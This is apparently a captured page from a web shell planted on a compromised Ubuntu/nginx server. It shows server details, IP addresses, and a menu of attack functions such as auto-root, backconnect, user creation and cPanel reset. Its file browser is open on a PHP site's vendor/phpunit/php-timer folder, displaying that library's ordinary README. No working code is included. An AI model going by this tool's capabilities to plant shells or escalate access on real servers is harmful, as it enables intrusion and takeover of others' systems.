Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.52
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdgamatya /
vendor /
phpunit /
php-timer /
[ HOME SHELL ]
Name
Size
Permission
Action
src
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.gitattributes
16
B
-rw-r--r--
.gitignore
35
B
-rw-r--r--
.travis.yml
418
B
-rw-r--r--
LICENSE
1.54
KB
-rw-r--r--
README.md
1.04
KB
-rw-r--r--
composer.json
850
B
-rw-r--r--
phpunit.xml
712
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
[](https://travis-ci.org/sebastianbergmann/php-timer) # PHP_Timer Utility class for timing things, factored out of PHPUnit into a stand-alone component. ## Installation You can add this library as a local, per-project dependency to your project using [Composer](https://getcomposer.org/): composer require phpunit/php-timer If you only need this library during development, for instance to run your project's test suite, then you should add it as a development-time dependency: composer require --dev phpunit/php-timer ## Usage ### Basic Timing ```php PHP_Timer::start(); // ... $time = PHP_Timer::stop(); var_dump($time); print PHP_Timer::secondsToTimeString($time); ``` The code above yields the output below: double(1.0967254638672E-5) 0 ms ### Resource Consumption Since PHP Startup ```php print PHP_Timer::resourceUsage(); ``` The code above yields the output below: Time: 0 ms, Memory: 0.50MB
Close